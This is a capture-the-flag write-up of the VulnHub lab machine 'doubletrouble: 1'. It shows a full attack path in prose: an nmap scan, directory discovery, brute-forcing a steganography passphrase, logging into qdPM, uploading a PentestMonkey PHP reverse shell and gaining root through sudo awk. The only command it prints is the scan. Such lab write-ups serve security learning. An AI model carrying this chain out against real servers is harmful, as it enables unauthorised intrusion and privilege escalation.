IT and security stuff

doubletrouble: 1 Writeup

In this Writeup, I will go through doubletrouble: 1 made by tasiyanci available for free on VulnHub.

First step is to find the machine’s IP address.

sudo nmap 192.168.56.0/24 -T4

The address is 192.168.56.103 and we see two ports that are open. 80 should be a website and SSH on port 22.

This is the app running on port 80. qdPM

Now, let’s see if there are any directories we can find with dirsearch.

So far, we found a couple directories. None of them is really useful except for “/secret”
on /secret I find a JPEG file. At first this seems useless however, with CTF experience I know there is clearly a chance to find something useful.
Let’s download it and analyze it with steg tools.
I need a passphrase. Let’s bruteforce it.
Found it! Let’s what it’s hiding.
There is an email addresse with something that looks like a password. Let’s try these on qdPM login page.
Boom! we’re in! At this point my objective is to find a way to get a reverse shell on this server. There might be a way to upload files and execute them.
I use a php reverse shell made by PentestMonkey.
Now, my file is uploaded. However I can’t open it from here it will only download it. I must find a way to reach the file and make it render on the webserver.
Earlier with dirseach I found an /uploads/ directory. As we can see on the screenshot, my file is there.
Before executing the file I start my listener.
Clicking on my php file, send me a nice reverse shell.
This is a huge vulnerability. I can actually use awk as any users, including root.
GTFOBins is a great ressource for bin exploitation.
I just run this command as root and gain privileges! Done!

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.